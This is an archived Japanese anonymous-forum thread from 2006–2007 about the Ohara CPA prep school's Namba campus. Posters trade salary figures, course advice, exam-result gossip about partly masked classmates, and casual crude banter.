363 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 12:51:49 ID:???
説明会で聞いた話。入所年度480万、一年毎に月額で一万アップで、シニアや公認会計士になれば月額5万アップだから、スタート時で月額30万だから会計士登録したら40万近くになってるはず。40万×16月(12月+賞与4月)で640万。

364 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 12:52:20 ID:???
>>362その額は月給+ボーナスです、16で割った額が月収の目安です。
その額にプラス残業手当が付きますので、残業込み年収だと初年度は大体550〜600くらいです。

365 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 17:01:27 ID:???
しかし、仕事がきつくて辞める人多数。



366 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 20:28:37 ID:uUw/H3xP
>>358税理士の簿財は日商一級より簡単だと個人的には思う。
会計士講座の受験生なら答練で平均の8割取れてりゃ受かる。

>>361俺は9月から勉強始めるが、移籍も検討してる。
誰でも受けれるようになったせいで、難波校の受講生の知能LEVが、がくっと落ちて勉強環境がいっそう悪化してる気がするのは俺だけ?

367 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 23:49:47 ID:???
西中島いくか、TACいくかどっちがええかな?
雰囲気悪すぎ。レベル的に大原のなかで最低ランクと思う。

368 :一般に公正妥当と認められた名無しさん:2006/09/08(金) 00:24:18 ID:???
西中もたいしてかわらんだろ

369 :一般に公正妥当と認められた名無しさん:2006/09/08(金) 00:33:03 ID:???
難波偏差値 42
西中島偏差値 48
神戸偏差値 52
京都偏差値 55

370 :一般に公正妥当と認められた名無しさん:2006/09/08(金) 00:51:10 ID:???
皆勉強はじめてる?

371 :一般に公正妥当と認められた名無しさん:2006/09/08(金) 00:57:44 ID:???
俺は今月の終わりから。

372 :一般に公正妥当と認められた名無しさん:2006/09/08(金) 04:29:43 ID:WcQBtqla
>>363
レスありがとうございます!そんなに貰えるんですか!!!
僕の家は貧乏なので頑張って絶対公認会計士になります!
ありがとうございました。
>>364
レスありがとうございます!ボーナス込みってことですよね。
もう残業でもなんでもいいからたくさん稼ぎたいです。
ありがとうございました。

373 : ◆vKsFzNEhQI :2006/09/08(金) 04:33:25 ID:???
お前は金の亡者かww

374 :一般に公正妥当と認められた名無しさん:2006/09/09(土) 14:46:17 ID:???
なんか会計士科より税理士の方がかわいい、綺麗な人多いね。

375 :一般に公正妥当と認められた名無しさん:2006/09/11(月) 09:41:35 ID:???
そうか?マジ税理士うるせっ。

376 :一般に公正妥当と認められた名無しさん:2006/09/12(火) 08:45:51 ID:???
税理士うざいか?
少し変わった人達だとは思うが…
俺はなんとも思わんがな〜

377 :一般に公正妥当と認められた名無しさん:2006/09/13(水) 19:40:07 ID:???
みんな内定とれた?

378 :一般に公正妥当と認められた名無しさん:2006/09/13(水) 19:51:49 ID:???
おっさんは論文どうだったんだ?

379 :一般に公正妥当と認められた名無しさん:2006/09/13(水) 20:20:23 ID:JwTyWdRP
予備校のかわいい女とセックルするためには
頭良くないと無理かな?

380 :一般に公正妥当と認められた名無しさん:2006/09/13(水) 20:26:18 ID:???
何故顔という選択肢が1番にこないのかと小一時間・・・

381 :一般に公正妥当と認められた名無しさん:2006/09/13(水) 20:48:15 ID:JwTyWdRP
>>380
わりと顔はいいほうだと思います(学校だとある程度モテる)
でも予備校だと頭も良くないと駄目かなと思いまして。あと僕は来年4月からの2年ロングに通う予定の大学1年生です

382 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 04:03:39 ID:???
難波は南の楽園と言われるほど馬鹿だから、馬鹿な女も簡単に抱けるんじゃないかな。

383 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 08:45:05 ID:???
南の楽園の割には論文までいってる奴多いぞ!とマジレス。
今年の入門生は女少ない感じもするな。まぁ女ほしいなら税理士コースのほうがいいぞ。

384 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 11:36:24 ID:???
>>383
大原生の60%以上が論文までいったのに、難波の合格率は40%くらいか。
南の楽園そのものじゃないか。


385 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 16:38:24 ID:???
上級生いれての話やろそれ…。
公開模試で受けた他校生の分も調べあげてカウントしてるぞ。6割も大原から出てたら凄すぎだ。

386 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 20:20:09 ID:???
来年度の受験はDVD通信します。難波校のみなさん長い間どうもありがとう
ございました。また、たまに難波校に顔を見せに行きます。

387 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 01:06:41 ID:???
>>386
誰ですか?通信なんかにしたらひきこもりで勉強しなくなって、また成績下がって、来年落ちるぞ。つらくても通学にしろ。

388 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 11:46:39 ID:???
>>387
一応難波校には長い間在籍していたよ、でも勉強はいつも家でやっていたから
答練以外はほとんど難波校へ行くことはなかったな。

389 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 12:20:42 ID:eH5IhUSq
禿同。
家で勉強できない香具師が、予備校に足を運んだからといって、
勉強できるわけがない。

それに、大原ナンバの自習室はマターリしすぎ。
ただ、座っているだけのヤシじゃないの?

390 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 15:35:07 ID:???
あずさの内定もらった奴いる?いたら同期だね^^

391 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 16:14:18 ID:???
ノシ

392 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 20:54:27 ID:4bTGm8uK
俺は新日の内定もらったよ^w^ノ
アホグループで傷のなめあいは最悪だが・・・
予備校で成績優秀者のグループに混ざるのが合格への近道。
一人でがんばるより、ライバルとがんばれとドラゴン桜にも書いてあったぞw>386


393 :一般に公正妥当と認められた名無しさん:2006/09/16(土) 00:34:14 ID:???
>>392
もう通信で申し込みしちゃったから、今年は通信でやります。

394 :一般に公正妥当と認められた名無しさん:2006/09/16(土) 00:44:26 ID:???
以前、優秀者の話題で出た谷〇やきれいなね−ちゃんはどこの内定もらったんだろ?

395 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 00:30:18 ID:Ak1NrUfL
福○と眼鏡っ娘もきになる・・・
難波校講師のIとMも説明会で目撃されてるらしいが、彼らも就職するのかな?

396 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 01:02:50 ID:jSeD5Zr9
難波校に通う予定の者ですが、この掲示板を見ていたらレベルが低いみたいで
不安になってきました。ですが立派に合格している方もいらっしゃるみたいで
すので、講師等に問題はなく個人の努力次第で合格できると考えていいのでしょうか?

397 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 01:38:06 ID:???
難波はやばいぜ

398 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 09:18:14 ID:NwJIwp1E
自分の努力次第   当たり前だけど

399 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 10:50:25 ID:???
環境も大事やな

400 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 11:23:09 ID:NwJIwp1E
それと先生かな良い先生だといいけど 年が近いと頼りなく感じる

401 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 12:12:54 ID:???
答練で名前のってない奴は名前のってる俺に敬語使えよ。

402 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 16:29:48 ID:???
「おっさん」よ!
できはどーだったんだよ?おい!!!

403 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 17:43:31 ID:???
そっとしといてやれよ

404 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 20:22:19 ID:???
論文受けた奴ってそろそろ勉強再開する?フリープランだろうけどやっぱ200?

405 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 21:45:58 ID:???
>>404
そうだよ、俺もフリープラン200だよ。

406 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 11:57:07 ID:???
簿記や管理会計のステップは基礎Tから取る?応用からでよいと思うのだが…
あと監査って上級完成か圧縮どちらがよい?財表は木村って先生だが東京Vの新井とどちらが良い?

407 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 19:49:43 ID:???
>>406
管会のステップは管会に自身があるなら応用からでいいと思う、簿記は今回、
会社法の影響で貸借対照表の様式が変わるので、新会社法ベースの貸借対照表
に慣れるという意味で基礎Tからとってもいいのでは?監査については現在の
自分自身の理解の度合を参考に。財表については授業中の口頭の説明は木村の
ほうが絶対良い、また授業のレジュメは東京Vの新井のほうが良い。

408 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 11:47:22 ID:???
詳しく説明会ありがとう!もう一ヶ月くらい経つんだよな…。
そろそろ申込しないと…。財表が悩むところ…。あと租税のDVDの基礎レクの講師って誰?

409 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 19:04:16 ID:???
>>408
租税基礎のDVDは大阪Vで担当は太田だと思う。

410 :一般に公正妥当と認められた名無しさん:2006/09/25(月) 18:54:57 ID:???
おーい、誰か何か書けよ・・・。

411 :一般に公正妥当と認められた名無しさん:2006/09/25(月) 21:38:06 ID:???
何か

412 :一般に公正妥当と認められた名無しさん:2006/09/25(月) 21:46:08 ID:???
論文組で来年用に申し込んだヤシいるか?
俺は明日行こうと思う。やっぱフリー200かな

413 :一般に公正妥当と認められた名無しさん:2006/09/25(月) 23:59:01 ID:???
>>412
俺は15万割引あるから80単位やな
つまり全額無料
今かね払う気ないからとりあえず80で
後から差額払えばかえられるし
てかうかってると思うがな
うかってたら教材やろうか?

414 :一般に公正妥当と認められた名無しさん:2006/09/26(火) 16:55:47 ID:???
租税はきってよし
短答後で十分まにあうらしいよ
短答特化したほうがいみたい

415 :一般に公正妥当と認められた名無しさん:2006/09/26(火) 20:33:41 ID:0Dqdnc6G
他の教科勉強しなくていいなら租税切ってても間に合うかもしれんが、
短答特化しなきゃ短答受からんような輩がそれで間に合うとは思えんがw
それに、短答合格者は今年より租税はLEVアップしてくるから
今年より間違いなく合格水準上がると思うぞ^w^

416 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 16:46:34 ID:rMcXtVXJ
よっしーラブ

417 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 17:59:03 ID:???
よっしーて誰?

418 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 18:16:24 ID:rMcXtVXJ
よっしー萌えます。
かわいいっす。
イイ体してるしね。

419 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 21:59:50 ID:???
よっしーって誰よ?
ヒントちょうらい

420 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 22:18:45 ID:???
リンゴが好きで緑色してるよ。ベロ長いよね。

421 :一般に公正妥当と認められた名無しさん:2006/10/01(日) 00:00:14 ID:???
>>416 >>418
「よっしー」って誰だ?
難波の新キャラか?

422 :一般に公正妥当と認められた名無しさん:2006/10/03(火) 22:38:47 ID:EYugNJsD
よっしーは僕のお気に入り

423 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 22:48:32 ID:???
難波校の情報を教えてくれ。

424 :一般に公正妥当と認められた名無しさん:2006/10/19(木) 09:48:20 ID:???
あげ

425 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 02:21:09 ID:AiTnPhu/
論文組みが消えて、難波校は南の楽園計画を爆進中だろww
この前、遊びに寄ったら休憩室では新上級生らしき輩の意味不明な会話が飛び交ってたぞ^^;
彼らを学校に通わせつづけている難波校講師陣はある意味賞賛に値する?

426 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 11:46:45 ID:???
>>425
何で、論文組が消えたんだ?そろそろ論文組が戻ってくる頃じゃないのか?

427 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 11:58:21 ID:???
去年までとは違うからな
論文組みの再スタートは去年より遅めだろう

428 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 19:04:32 ID:???
>>427
論文組は、いつぐらいから合流し始めるんだ?

429 :一般に公正妥当と認められた名無しさん:2006/10/22(日) 19:08:11 ID:???
>>428
一番多いのは12〜1月だと思う。
つわものだと春先まで戻ってこないかも。

430 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 00:57:15 ID:???
難波でトップ3に入る檜○が九月から既に勉強し始めてる件について…

431 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 01:21:52 ID:???
勉強ヲタ

432 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 11:50:17 ID:???
>>430
檜○は、今回の論文式駄目だったのか?

433 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 17:38:53 ID:???
茶髪の奴それって?

434 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 17:55:14 ID:???
坊ちゃんカットでメガネにチェックシャツ。いわゆる秋葉ファッション。

435 :一般に公正妥当と認められた名無しさん:2006/10/23(月) 23:24:46 ID:???
あいつかw
よく一緒にいる髪伸びてる香具師は?
茶髪って・・・よくウンチクたれてる人かな?

436 :一般に公正妥当と認められた名無しさん:2006/10/24(火) 14:21:37 ID:mN7VJUsi
明日からのステップの解説って誰するの?
予定表に書いてないけど。

437 :一般に公正妥当と認められた名無しさん:2006/10/24(火) 14:39:07 ID:???
秋特の講師じゃね?

438 :一般に公正妥当と認められた名無しさん:2006/10/24(火) 17:32:55 ID:???
管理簿記ともに解説講師は全部ランダムらしいよ〜
簿記で3人だっけ? 管理で2人ってことは聞いたなぁ〜。
管理の解説女の先生もするかも。と噂で聞いたな。


439 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 10:01:20 ID:???
今日のステップどうだった?俺84くらい。しかし久しぶりにあれほど多い人数見たよ。

440 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 12:11:25 ID:???
オイラ42点・・・orz。

441 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 14:34:25 ID:P5clznln
>>一問4点の問題で42点ですか?www

442 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 15:29:28 ID:???
馬鹿死ね

443 :一般に公正妥当と認められた名無しさん:2006/10/25(水) 19:16:47 ID:???
>>441
論文終わってから簿記の問題、1問も解いてなかったんだ・・・。

444 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 02:11:25 ID:???
足し算から復習しましょう

445 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 05:50:26 ID:???
難波校のDVD個別視聴室ってどうですか?
狭かったり集中しにくいってことはない?

446 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 20:03:40 ID:???
夜9時半すぎに男と女がキスや手マンしてたのを見た事ならある。

447 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 22:42:38 ID:???
茶髪の奴って入門生の谷〇でしょ?
あいつ最終的には難波のトップだったな。
06の話ね。

448 :一般に公正妥当と認められた名無しさん:2006/10/26(木) 23:57:09 ID:???
茶髪で背が高く太ってる人だよ?

449 :一般に公正妥当と認められた名無しさん:2006/10/27(金) 13:45:19 ID:???
ステップ出てるか?

450 :一般に公正妥当と認められた名無しさん:2006/10/27(金) 21:46:36 ID:???
南都ビルってどこにあるんですか?

451 :一般に公正妥当と認められた名無しさん:2006/10/27(金) 23:39:48 ID:???
南都の7Fの休憩室のロッカ−になぞの標語みたいなの張ってあるけど、あれ何?

上級生のありがちなパタ−ンとか、問題を解く前に「これができなければ落ちる」
と言い聞かせよ、とか書いてあるんだけど。

452 :一般に公正妥当と認められた名無しさん:2006/10/28(土) 02:35:26 ID:???
俺も喫煙室行く時見た事ある。
眼鏡かけた人じゃないか?

453 :一般に公正妥当と認められた名無しさん:2006/10/31(火) 12:40:04 ID:???
07入門ですが、短答落ちの上級生さんて大したことないんですねww

454 :一般に公正妥当と認められた名無しさん:2006/10/31(火) 18:15:37 ID:???
当たり前だろ。担当落ちてるんだから。

455 :一般に公正妥当と認められた名無しさん:2006/11/01(水) 02:14:25 ID:???
ターゲット低いとこに設定して喜ぶな

456 :一般に公正妥当と認められた名無しさん:2006/11/01(水) 03:18:30 ID:???
今日のステップ簿記・特商がんばるぞ!目指すは上位10%!

457 :一般に公正妥当と認められた名無しさん:2006/11/01(水) 07:22:08 ID:???
07入門生は去年の06入門生の谷〇を目指せ。
彼は全3回の公開模試全てに名前を載せるという偉業を達成した男だ。
関西の上位10%なんかで満足しちゃだめだよ´_`

458 :一般に公正妥当と認められた名無しさん:2006/11/01(水) 12:33:11 ID:???
あいつは別格だから気にすんな。
普通の入門生は去年の福〇あたりで十分でしょ。

459 :一般に公正妥当と認められた名無しさん:2006/11/02(木) 12:03:01 ID:???
06生はもう上級に復帰してるのかな?
短答免除があるから年明け後参入ってのが多いのか?

460 :一般に公正妥当と認められた名無しさん:2006/11/04(土) 20:15:38 ID:ndbLmJrC
最近よっしーの姿が見えない。

461 :一般に公正妥当と認められた名無しさん:2006/11/08(水) 22:13:48 ID:???
正直入門生100人中 何人受かりますか?

462 :一般に公正妥当と認められた名無しさん:2006/11/08(水) 22:36:04 ID:???
1人か2人くらい。

463 :461:2006/11/08(水) 22:56:00 ID:???
まじすか・・ キビ氏

464 :一般に公正妥当と認められた名無しさん:2006/11/09(木) 17:05:19 ID:???
今年はもう少し受かってんじゃね?短答だけでも20人くらい受かったって話聞いたよ。

465 :一般に公正妥当と認められた名無しさん:2006/11/10(金) 01:18:15 ID:ye+dP92u
難波の短答合格の大部分は短答合格者全体の下2割での合格だろww
去年なら間違いなく落ちてる。
したがって今年も難波は論文壊滅状態と読んだ^o^ノ

466 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 00:15:07 ID:ZcghbGDO
勉強いやや!

467 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 03:03:58 ID:???
受かってますように!!

468 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 11:08:40 ID:???
合格してたぁ!

469 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 12:28:41 ID:???

               _.. ..‐::´/
             _/::::::::::::/
           _/:::::::::::::/ ____
         ,..::::´::::::::::::::::::::: ̄:::::::::::._/
       /:::::::::::::::::| ヽ、:::::;::::::::::::/
       /:::::::::::::::::::::|´|ヽ   |/_:::.::/
  _ .. -─':::::::::::::::、::|`'   ,   .!::∠
  `'' ‐-.._:::::::;-‐、`(●)  (●) |::::`::-、オッス!オラ、一括不合格、科目なし
 =ニ二::::::::::::::::|6    \___/、| -──` 将来がやべえ状態だってのに
    ‐=.二;;;;;`‐t    \/  ノ       なんだかすっげえワクワクしてきたぞ!


470 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 14:43:33 ID:???
07入門生ですが皆さんどうだったんですか?
檜○、谷○、その他の合否は?

471 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 20:23:48 ID:???
か・い・め・つ

472 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 20:28:21 ID:???
本当なんですか?

473 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 20:30:51 ID:???
>>472
論文スレにレスあったよ
壊滅的だって

474 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 23:10:44 ID:???
檜〇は落ちた
谷〇は受かった(全国最年少)
奥〇は受かった
その外は知らねー

475 :一般に公正妥当と認められた名無しさん:2006/11/20(月) 23:10:56 ID:???
>>471 >>472
彼らは、科目合格もなかったのかい?

476 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 00:21:27 ID:???
まぁ確かに谷〇は最年少のスペックを十分持ってたもんな
福〇は?

477 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 00:28:17 ID:???
檜○が落ちたとは…女勢は?

478 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 00:29:17 ID:???
なんだこの実名トークはW

479 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 01:06:14 ID:???
壊滅。難波は廃墟と化した。

480 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 01:13:22 ID:???
谷○と奥○って入門生だろ?すげぇな…

481 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 01:29:34 ID:???
谷〇は入門生でしかも最年少合格だぞ?
凄いなんてレベルじゃない…

482 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 02:26:35 ID:???
難波から最年少か、、、世も末だなw

483 :nanbaman:2006/11/21(火) 12:52:05 ID:B5VpEDpB
赤いニンテンドーDS持って、一日中ポケモンの話ばっかして腹立つよ!!!!

484 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 13:05:45 ID:???
難波は何人受かってたんだ?

485 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 14:28:15 ID:???
難波の合格者
谷〇
奥〇(男)
奥田(女)
八〇



あとは知らない

486 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 19:44:44 ID:???
さすがに20人はいくんでしょ・・

487 :一般に公正妥当と認められた名無しさん:2006/11/21(火) 22:48:18 ID:???
祝賀会どうだった?

488 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 00:34:15 ID:???
>>474
檜〇落ちたってマジかよ。
内定者懇親会では意気揚々だったのにかわいそうにな。

489 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 00:57:05 ID:???
官報見たが答練でよく見る名前は難波では12人ほどだったな。福○もいた。

490 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 01:42:28 ID:???
結果、入門一発一括合格を果たしたのは谷〇と福〇だけだったな。
てか谷〇ってほんとに最年少らしいな、すっげ−!

491 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 10:32:13 ID:J6BCKOHm
合格者は10人くらいみたいよ
谷○   ←一発
奥○(男)←一発
奥○(女)
八○
服○   ←一発
福○   ←一発
芝○
岡○
西○


・etc
難波はいかに、南の楽園の負のオーラに汚染されずに1年過ごすかが勝負の分かれ目w

492 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 11:48:53 ID:???
昨日の祝賀会で谷〇見たけど、かなり見た目と頭脳のギャップが激しかったw
ほんとに合格したの?最年少なの?と疑いたくなったw

493 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 17:55:53 ID:???
祝賀会ではどんなことがあったのかお教え下さい

494 :一般に公正妥当と認められた名無しさん:2006/11/22(水) 18:50:17 ID:???
そりゃ能力・戦闘力は外観とは無関係だわ

495 :一般に公正妥当と認められた名無しさん:2006/11/23(木) 14:14:19 ID:???
祝賀会、何人くらいきてた?

496 :一般に公正妥当と認められた名無しさん:2006/11/23(木) 19:33:57 ID:RWenKZ3Q
100人くらいかな。

497 :一般に公正妥当と認められた名無しさん:2006/11/24(金) 09:32:51 ID:???
なんちゃって大原生もきてるだろうから今年はTに負けたかな

498 :一般に公正妥当と認められた名無しさん:2006/11/24(金) 18:22:07 ID:???
結局、難波で来年論文専念組は何人くらいなの?

499 :一般に公正妥当と認められた名無しさん:2006/11/26(日) 17:20:52 ID:mte1TwWR
論文組みって見ないねえ^^;
年明け復帰か??
でも、短答免除って実際どうなんかね?
今年の合格率だと、短答合格者のうち約半分は会計士になる事無く短答免除取消・・・
そして、簿記の岡○先生、大原に永久就職♪

500 :一般に公正妥当と認められた名無しさん:2006/11/26(日) 17:49:58 ID:???
短答落ちが偉そうに吠えるなよ。

501 :一般に公正妥当と認められた名無しさん:2006/11/27(月) 14:25:33 ID:???
来月は地獄の答練ラッシュ…
ついていけるかな…

502 :一般に公正妥当と認められた名無しさん:2006/11/27(月) 16:07:04 ID:???
さて、ガイダンスに行ってくるか

503 :一般に公正妥当と認められた名無しさん:2006/11/30(木) 16:55:04 ID:???
来週から上級答練…怖いな

504 :一般に公正妥当と認められた名無しさん:2006/12/01(金) 18:47:08 ID:???
ちょwww
関西のHPに谷○の写真でてるよwww


505 :一般に公正妥当と認められた名無しさん:2006/12/04(月) 23:11:39 ID:h0mh70g0
答練混んでるねえ^^;
いい加減,無駄な努力はやめて撤退しろと・・・
難波校は講師まで妙な色気出してみてて、むしろ痛々しいぞ><
無駄な努力してる暇あったらもう少しましな授業しろと。
and早朝答練遅刻せずにチャント問題配れw

506 :一般に公正妥当と認められた名無しさん:2006/12/07(木) 17:40:15 ID:???
皆論文答練書ける?企業法と財表終わったけど点数来そうに無いんだが…。

507 :一般に公正妥当と認められた名無しさん:2006/12/11(月) 18:58:20 ID:???
この通りになったな…

322 :一般に公正妥当と認められた名無しさん :2006/08/16(水) 16:29:54 ID:???
成績優秀者でも○○みたいな答練バカは微妙

508 :一般に公正妥当と認められた名無しさん:2006/12/11(月) 23:50:18 ID:???
○○って?
もしかしてあの御方ですか?


509 :一般に公正妥当と認められた名無しさん:2006/12/12(火) 20:39:51 ID:???
>>508
そうだよ!言った通りになったじゃねーか!

510 :一般に公正妥当と認められた名無しさん:2006/12/12(火) 22:19:23 ID:???
でも点数良いに越したことはないのでは?
毎回かなり上位にランクインされてますね。


511 :一般に公正妥当と認められた名無しさん:2006/12/13(水) 21:09:58 ID:???
合格しなきゃ意味ねーよな。
そんな俺は成績低レベルの合格者。

512 :一般に公正妥当と認められた名無しさん:2006/12/13(水) 21:54:07 ID:???
成績が良くても合格できないってのはどこか問題だと思う。

513 :一般に公正妥当と認められた名無しさん:2006/12/13(水) 23:29:32 ID:???
>>511
今の時期どれくらいの点数とってました?
毎日毎日とうれんでもうアップアップです!

514 :一般に公正妥当と認められた名無しさん:2006/12/14(木) 21:51:55 ID:???
短刀式計算猛特訓

実施日12月28日9時〜
@簿記9:30〜11:30
A管理12:00〜13:30
B簿記14:30〜16:30
C管理17:00〜18:30
D簿記19:00〜21:00


515 :一般に公正妥当と認められた名無しさん:2006/12/15(金) 16:55:43 ID:???
>>513
毎回答練で名前が載るかどうかくらいの微妙な点数だったよ。
2回か3回に一度くらい名前が載る程度。
そこまで成績低くないかも知れんが、合格者の中では平均以下だと思う。

516 :一般に公正妥当と認められた名無しさん:2006/12/23(土) 23:30:23 ID:???
あず〇失敗だったわ…

517 :一般に公正妥当と認められた名無しさん:2006/12/24(日) 00:13:22 ID:???
kwsk

518 :一般に公正妥当と認められた名無しさん:2006/12/24(日) 00:31:16 ID:???
あずさ
新日本
トーマツ
みすず
あらた

難波校受験生で人気なのはどこ?

519 :一般に公正妥当と認められた名無しさん:2006/12/24(日) 13:25:47 ID:???
>>516
えらく見切りが早いな。
どうしたの?

520 :一般に公正妥当と認められた名無しさん:2006/12/25(月) 00:58:55 ID:???
今年のミナミの楽園ではカップル大量にできたかな?

521 :516です:2006/12/26(火) 18:02:37 ID:???
やってらんねぇよ

522 :一般に公正妥当と認められた名無しさん:2006/12/26(火) 21:31:39 ID:???
あずさ退職しますた

523 :一般に公正妥当と認められた名無しさん:2006/12/26(火) 23:13:55 ID:lX1Jgroj
あずさ    =使い捨て。三次試験(現終了試験)に受からない。
あらた&みすず=日興問題で再び新聞紙上を賑わしてる。

となると、2択では??
まあ、南の楽園には関係の無い話しかね?w
そーいや、辞めたとおもってた眼鏡っ子が復活してたな。


524 :一般に公正妥当と認められた名無しさん:2006/12/27(水) 00:05:21 ID:???
一応短答合格者だろ眼鏡っ子。

525 :一般に公正妥当と認められた名無しさん:2006/12/31(日) 02:40:52 ID:p0aWgiNW
ヤフーオークションで大原のテキスト売ってるんだが・・・

http://page4.auctions.yahoo.co.jp/jp/auction/d69880791

これつい1日前にオークション終わったものなんだけど・・・

結構人気あって最終7万くらいでこのIDの人が落札。
で、次の日に別のアングルの写真でまた出てる!
同一人物で希望額まで届かなかったから自分の別IDで落札してたみたい^^


526 :一般に公正妥当と認められた名無しさん:2007/01/08(月) 23:06:08 ID:ovyIWwNm
よっしー、髪切ってた!!!!
何かあったのかなぁ?

527 :一般に公正妥当と認められた名無しさん:2007/01/14(日) 22:24:26 ID:7sVeRofs
今日もよっしーいなかったー

528 :一般に公正妥当と認められた名無しさん:2007/01/18(木) 13:33:27 ID:ugKQBeAb
誰だよっしーって

89 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)